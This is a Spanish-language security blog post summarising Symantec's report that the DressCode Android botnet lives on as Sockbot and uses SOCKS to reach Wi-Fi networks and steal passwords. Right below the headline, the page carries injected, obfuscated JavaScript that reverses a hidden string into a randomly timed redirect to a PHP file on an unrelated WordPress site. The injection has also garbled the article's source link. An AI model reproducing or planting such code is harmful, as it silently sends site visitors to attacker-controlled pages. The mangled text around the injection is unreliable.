Vulnerabilidad en Android pone en riesgo a cuatro millones de usuarios

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-light/» target=»_blank» rel=»noopener»>Ars Technica.

El malware conocido como DressCode se creía eliminado cuando en 2016 Google eliminó 400 aplicaciones que lo instalaban. Sin embargo, 16 meses después el botnet sigue activo, aunque ahora bajo el nombre de Sockbot, según la firma de seguridad Symantec.

De acuerdo con Symantec, en octubre del año pasado se reveló que millones de nuevas aplicaciones maliciosas fueron descaragadas recientemente, las que utilizan el mismo método que DressCode.

La infección obliga a los celulares a usar el protocolo SOCKS y con ello los hackers pueden acceder directamente a las redes Wi Fi a las que se conecta el teléfono, robando fácilmente las contraseñas. Asimismo, podrían ingresar a los computadores o dispositivos vinculados al router, y desde allí acceder a archivos sin protección.

Ver información original al respecto en Fuente:

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies